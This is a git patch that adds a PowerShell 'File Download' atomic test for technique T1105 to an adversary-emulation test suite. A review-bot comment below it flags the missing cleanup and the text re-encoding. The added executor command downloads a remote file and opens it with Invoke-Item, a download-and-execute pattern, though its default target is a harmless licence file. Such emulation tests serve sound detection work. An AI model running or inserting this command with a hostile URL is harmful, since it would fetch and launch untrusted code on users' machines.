From e8899b4df6d24fb2f8fcc9a93e1e5fb3bdfd384c Mon Sep 17 00:00:00 2001
From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com>
Date: Mon, 26 Jul 2021 13:00:42 -0700
Subject: [PATCH] Additional PowerShell Download in T1105

---
 atomics/T1105/T1105.yaml | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)

diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml
index c90158a6..7838f6a5 100644
--- a/atomics/T1105/T1105.yaml
+++ b/atomics/T1105/T1105.yaml
@@ -381,3 +381,23 @@ atomic_tests:
       timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} "#{query}" > #{output_file}
     cleanup_command: |
       rm -f #{output_file}
+
+- name: File Download via PowerShell
+  auto_generated_guid: 54a4daf1-71df-4383-9ba7-f1a295d8b6d2
+  description: |
+    Use PowerShell to download and write an arbitrary file from the internet. Example is from the 2021 Threat Detection Report by Red Canary.
+  supported_platforms:
+  - windows
+  input_arguments:
+    target_remote_file:
+      description: File to download
+      type: string
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt
+    output_file:
+      description: File to write to
+      type: string
+      default: LICENSE.txt
+  executor:
+    command: |
+      (New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File #{output_file}; Invoke-Item #{output_file}
+    name: powershell
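Review bot: The new test has no `cleanup_command`, unlike the whois test directly above it in the same hunk, so `#{output_file}` is left on disk after every run (and `Invoke-Item` leaves whatever handler opened it running). Adding `cleanup_command: |` followed by `Remove-Item #{output_file} -Force -ErrorAction Ignore` under `executor:` would match the file's convention. Separately, the description promises an "arbitrary file" but `DownloadString | Out-File` re-encodes the body as text (Out-File defaults to UTF-16LE in Windows PowerShell 5.1, as far as I recall), so a binary payload would not arrive byte-exact; either state that the test emulates the DownloadString pattern from the report specifically, or switch to `DownloadFile('#{target_remote_file}', '#{output_file}')` if a faithful download is the goal. Note also that `Invoke-Item` hands the downloaded file to its default handler, so pointing `target_remote_file`/`output_file` at an executable will run it — a one-sentence warning in the description would help anyone overriding the defaults.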